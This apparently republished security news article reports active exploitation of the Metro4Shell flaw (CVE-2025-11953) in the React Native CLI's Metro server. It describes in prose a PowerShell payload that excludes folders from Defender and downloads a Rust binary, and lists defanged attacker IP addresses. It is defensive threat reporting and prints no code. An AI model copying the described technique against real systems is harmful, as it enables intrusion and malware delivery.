Critical Metro4Shell Vulnerability Exploited in React Native

Critical Metro4Shell Vulnerability Exploited in React Native

Posted on By CWS

Key Points

  • Metro4Shell vulnerability in React Native CLI is being exploited.
  • Allows remote code execution with a CVSS score of 9.8.
  • Exploitation involves delivering a PowerShell script.

Introduction to the Exploit

Hackers have begun exploiting a significant security weakness in the Metro Development Server, part of the widely used ‘@react-native-community/cli’ npm package. This vulnerability, identified as CVE-2025-11953 and nicknamed Metro4Shell, was first observed by cybersecurity firm VulnCheck on December 21, 2025. The flaw carries a critical CVSS score of 9.8, enabling attackers to execute arbitrary commands on the affected host systems.

The vulnerability was initially documented by JFrog in November 2025. Despite the severity and the potential for widespread exploitation, public recognition of the threat has been minimal since its discovery.

Details of the Attack Methodology

In the attacks monitored by VulnCheck’s honeypot network, cybercriminals have been using the Metro4Shell flaw to deliver a Base64-encoded PowerShell script. This script is designed to perform several malicious activities. Among them is the exclusion of specific directories from Microsoft Defender Antivirus scans, particularly the current working directory and the temporary folder.

The script further establishes a direct TCP connection to an external server controlled by the attacker. This connection facilitates the downloading of a binary file, which is then executed on the compromised system. The binary, written in Rust, includes mechanisms to thwart static analysis, complicating detection efforts.

  • Connection made to: 8.218.43[.]248:60124
  • Originating attack IPs: 5.109.182[.]231, 223.6.249[.]141, 134.209.69[.]155

Analysis and Implications

VulnCheck has characterized these activities as consistent and operational, rather than experimental or exploratory. The persistent use of similar payloads over several weeks suggests a deliberate campaign rather than preliminary testing or vulnerability scanning.

The case of CVE-2025-11953 is particularly noteworthy not only due to its existence but because it highlights a recurrent issue in cybersecurity. It underscores the transformation of development environments into production targets as soon as they become accessible on public networks.

Conclusion

The exploitation of the Metro4Shell vulnerability in the React Native CLI package is a critical reminder of the vulnerabilities inherent in open-source software and the need for robust security measures. Organizations using this software should urgently review their security protocols to mitigate potential risks associated with this flaw.

The Hacker News Tags:, , , , , , , , , ,

Related Posts

Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44 Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44 The Hacker News
An Anti-Sales Guide for MSPs An Anti-Sales Guide for MSPs The Hacker News
CTM360 Identifies Surge in Phishing Attacks Targeting Meta Business Users CTM360 Identifies Surge in Phishing Attacks Targeting Meta Business Users The Hacker News
How Small Teams Can Secure Their Google Workspace How Small Teams Can Secure Their Google Workspace The Hacker News
Chinese Threat Group ‘Jewelbug’ Quietly Infiltrated Russian IT Network for Months Chinese Threat Group ‘Jewelbug’ Quietly Infiltrated Russian IT Network for Months The Hacker News
6 Browser-Based Attacks Security Teams Need to Prepare For Right Now 6 Browser-Based Attacks Security Teams Need to Prepare For Right Now The Hacker News